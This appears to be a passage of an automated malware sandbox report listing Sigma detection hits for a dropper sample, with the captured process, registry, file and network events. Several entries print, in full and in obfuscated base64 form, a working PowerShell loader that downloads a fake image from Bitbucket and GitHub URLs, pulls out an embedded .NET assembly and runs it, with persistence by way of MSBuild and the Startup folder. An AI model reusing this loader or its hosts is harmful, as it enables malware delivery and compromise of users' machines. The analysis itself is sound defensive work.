                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$Z
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$Z
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 87.120.126.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49822
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3lhrJ4X.exe, ProcessId: 7680, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7256, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnk
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$Z

                  Data Obfuscation

                  barindex
